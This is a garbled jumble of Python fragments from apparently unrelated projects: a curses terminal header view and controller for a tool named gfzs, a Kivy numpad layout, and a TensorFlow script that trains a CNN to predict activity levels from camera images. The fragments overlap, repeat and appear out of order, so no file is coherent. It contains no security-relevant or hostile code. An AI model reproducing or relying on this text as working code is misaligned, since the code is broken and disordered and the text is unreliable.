print(\"Error:", "error = str(e) finally: target._end_curses() if error != None: logger.error(error) print(error) logger.debug(\"end %s\"", "else: self.window.addstr(0, i, c, self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE) + 1", "signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import runtime.config as", "self.version, self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), )", "os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: #", "= self.window.getch() except curses.error: continue except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: 
self.reset()", "__init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" % info.__version__ self.copyright = info.__copyright__", "if __name__ == \"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model", "_make_header(self): start_index = 0 # Write Google google = list(GOOGLE) first_o = True", "entire screen. logger.debug(\"init curses\") stdscr = curses.initscr() color.init() # turn off automatic echoing", "logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a window", "% error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a window object representing the", "turn off automatic echoing of keys to the screen curses.noecho() # Buffering off", "= info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\")", "self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width", "curses.error as e: error = str(e) finally: target._end_curses() if error != None: logger.error(error)", "\"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger from base import", "# initscr() returns a window object representing the entire screen. 
logger.debug(\"init curses\") stdscr", "if os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None,", "start_index = 0 # Write Google google = list(GOOGLE) first_o = True for", "first_o: first_o = False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\"))", "import runtime.config as runtime_config import utils.color as color progname = \"gfzs.views.header\" properties =", "Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need", "continue except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\":", "None, \"header\") self.version = \"(%s)\" % info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header]", "self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c)) # Write", "self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width,", "curses application. 
\"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create()", "debug # need when 「cat fixtures/rust.json | python -m gfzs」 # need when", "_init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894", "runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\") for error in runtime_config.errors: logger.error(error)", "user_input = self.window.getch() except curses.error: continue except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE:", "def _loop(self): self.create() while True: try: user_input = self.window.getch() except curses.error: continue except", "| self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\": class TestHeader(Header): def run(self): self._loop()", "if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger", "handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is invalid.\") for", "self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index =", "len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright self.window.addstr( 0, self.parent_width", "logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh()", "len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion start_index += len(SEARCH)", "# 
turn off automatic echoing of keys to the screen curses.noecho() # Buffering" ]
[ "0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint:", "0.8, 1 text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1 callback", "callback = None def select_btn(self, num): self.selected_btn = num if self.callback: self.callback(num) class", "text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols:", "size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton:", "spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton:", "NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton:", "3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '1' on_release:", "'3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7'", "NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>:", "'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text:", "BlueButton: size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text:", "4 spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3'", "text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text:", "on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout):", "'6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1", "'horizontal' BlueButton: size_hint: 0.2, 1 text: '2' 
on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1", "Numpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn = num", "0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint:", "text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2) ''')", "self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num):", "size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton:", "class Numpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn =", "<NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing: 3, 3 NumpadBlueButton: text:", "1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1)", "= 1 callback = None def select_btn(self, num): self.selected_btn = num if self.callback:", "on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5", "NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows: 2 spacing: 3,", "1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2)", "0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service' on_release:", "BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2)", "text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1 callback = None", "text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text:", 
"NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton:", "size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton:", "select_btn(self, num): self.selected_btn = num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1", "root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation:", "'4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8'", "'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1 callback = None def", "<Numpad>: cols: 3 rows: 4 spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text:", "text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1", "'horizontal' BlueButton: size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1", "text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text:", "from kivy.uix.gridlayout import GridLayout from kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>:", "self.selected_btn = num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback =", "root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num):", "''') class Numpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn", "'1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y:", "size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): 
selected_btn = 1", "rows: 4 spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text:", "1 text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1 callback =", "NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton:", "class ActivityNumpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn =", "cols: 3 rows: 4 spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2'", "cols: 1 rows: 2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton:", "spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text:", "text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows: 2", "BlueButton: size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal'", "BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1)", "'1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5'", "Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing: 3, 3", "<ActivityNumpad>: cols: 1 rows: 2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal'", "kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing:", "'2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2) ''') class", "0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App' on_release:", "1 callback = None def select_btn(self, num): self.selected_btn = num if self.callback: 
self.callback(num)", "size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service'", "root.select_btn(2) BlueButton: size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn", "self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton:", "root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '2' on_release:", "text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout:", "from kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4", "ActivityNumpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn = num", "'9' <ActivityNumpad>: cols: 1 rows: 2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation:", "num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback = None def", "size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text: 'App'", "on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn = 1 callback = None def select_btn(self,", "1 rows: 2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint:", "BlueButton: size_hint: 0.8, 1 text: 'Service' on_release: root.select_btn(2) ''') class Numpad(GridLayout): selected_btn =", "= num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback = None", "text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows: 2 spacing: 3, 3", "'8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows: 2 spacing: 3, 3 BoxLayout:", "NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' 
NumpadBlueButton:", "GridLayout from kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows:", "on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing: 3, 3 NumpadBlueButton: text: '1'", "num): self.selected_btn = num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback", "orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8,", "3 rows: 4 spacing: 3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton:", "text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton: text:", "'5' NumpadBlueButton: text: '6' NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9'", "on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '2'", "selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn = num if", "if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback = None def select_btn(self,", "NumpadBlueButton: text: '7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows:", "None def select_btn(self, num): self.selected_btn = num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn", "<reponame>l337quez/Aplicaci-n-ANDROID-para-control-del-suministro-de-energia- from kivy.uix.gridlayout import GridLayout from kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text)", "rows: 2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2,", "'7' NumpadBlueButton: text: '8' NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows: 2 spacing:", "import GridLayout 
from kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3", "def select_btn(self, num): self.selected_btn = num if self.callback: self.callback(num) class ActivityNumpad(GridLayout): selected_btn =", "3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '1'", "1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2,", "BlueButton: size_hint: 0.2, 1 text: '1' on_release: root.select_btn(1) BlueButton: size_hint: 0.8, 1 text:", "3, 3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text:", "2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint: 0.2, 1", "Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing: 3, 3 NumpadBlueButton:", "'2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6'", "0.8, 1 text: 'App' on_release: root.select_btn(1) BoxLayout: size_hint_y: 0.5 orientation: 'horizontal' BlueButton: size_hint:", "kivy.uix.gridlayout import GridLayout from kivy.lang import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: self.parent.select_btn(self.text) <Numpad>: cols:", "text: '9' <ActivityNumpad>: cols: 1 rows: 2 spacing: 3, 3 BoxLayout: size_hint_y: 0.5", "= None def select_btn(self, num): self.selected_btn = num if self.callback: self.callback(num) class ActivityNumpad(GridLayout):", "text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text:", "NumpadBlueButton: text: '9' <ActivityNumpad>: cols: 1 rows: 2 spacing: 3, 3 BoxLayout: size_hint_y:", "import Builder Builder.load_string(''' <NumpadBlueButton@BlueButton>: on_release: 
self.parent.select_btn(self.text) <Numpad>: cols: 3 rows: 4 spacing: 3,", "orientation: 'horizontal' BlueButton: size_hint: 0.2, 1 text: '2' on_release: root.select_btn(2) BlueButton: size_hint: 0.8,", "NumpadBlueButton: text: '3' NumpadBlueButton: text: '4' NumpadBlueButton: text: '5' NumpadBlueButton: text: '6' NumpadBlueButton:", "3 NumpadBlueButton: text: '1' NumpadBlueButton: text: '2' NumpadBlueButton: text: '3' NumpadBlueButton: text: '4'", "self.callback(num) class ActivityNumpad(GridLayout): selected_btn = 1 callback = None def select_btn(self, num): self.selected_btn" ]
[ "model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1))", "shuffle=True #, #steps_per_epoch=1000 ) # save structure model_structure = model.to_json() f = Path(\"model_structure.json\")", "pandas as pd from sklearn import model_selection import tensorflow as tf from pathlib", "[160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish it down a bit", "x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train", "bit img_tensor /= 255.0 # normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape) #", "# img_raw = tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\")", "image_file = img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape)", "220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160])", "dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and preprocess a", "model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) # save", "255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() 
#model.add(tf.keras.layers.Conv2D(32,(3,3),", "a neural network that predicts an activity level based on a jpg image", "neural network that predicts an activity level based on a jpg image from", "img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor with", "#, #steps_per_epoch=1000 ) # save structure model_structure = model.to_json() f = Path(\"model_structure.json\") f.write_text(model_structure)", "x_test.astype(\"float32\") #x_train = x_train / 255 #x_test = x_test / 255 #y_train =", "with sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0)", "batch of images sess = tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value", "model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) #", "x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model =", "= tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) #", "axis=0) #print(\"np from tensor with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x shape\",", "shape\", x.shape) #print(y.shape) return x, y x_train, y_train = keras_data(df_train) x_test, y_test =", "#print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i] =", "160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) 
model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25))", "test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output arrays x = np.empty([0, 160,", "df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output arrays x", "+ data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80,", "= tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor,", "x.shape) #print(y.shape) return x, y x_train, y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid)", "#print(y.shape) return x, y x_train, y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train", "This is an initial attempt at doing regression based on image data. 
It", "print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape)", "= np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x, y x_train, y_train", "loosely based on TF image classification examples and \"Deep Leaning: Image Recognition\" on", "[y_value]) y[i] = y_value # convert image to a tensor # img_raw =", "y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) # save structure model_structure", "preprocess a batch of images sess = tf.Session() for i in range(0, data.datetime.count()):", "numpy as np import pandas as pd from sklearn import model_selection import tensorflow", "240]) # squish it down a bit img_tensor /= 255.0 # normalize to", "#model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3),", "= np.append(y, [y_value]) y[i] = y_value # convert image to a tensor #", "keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16)", "= np.empty([0, 160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) #", "#print(y.shape) # Read in and preprocess a batch of images sess = tf.Session()", "y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and preprocess a batch", "is an initial attempt at doing regression based on image data. 
It is", "\"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000", "from sklearn import model_selection import tensorflow as tf from pathlib import Path \"\"\"", "based on TF image classification examples and \"Deep Leaning: Image Recognition\" on Lynda.com", "activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit(", "tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish", "to a tensor # img_raw = tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw", "img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train)", "down a bit img_tensor /= 255.0 # normalize to [0,1] range # print(img_tensor)", "= y_train / 16 y_test = y_test / 16 #(x_train, y_train), (x_test,y_test) =", "keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train = y_train /", "activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10,", "tensor # img_raw = tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file)", 
"model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\"))", "= tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish it down", "#model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary()", "view sample image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid =", "= img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor", "y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test =", "Read in and preprocess a batch of images sess = tf.Session() for i", "= tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16 y_test = y_test / 16", "It is loosely based on TF image classification examples and \"Deep Leaning: Image", "TF image classification examples and \"Deep Leaning: Image Recognition\" on Lynda.com \"\"\" #", "sess = tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] +", "Output arrays x = np.empty([0, 160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32)", "python file trains a neural network that predicts an activity level based 
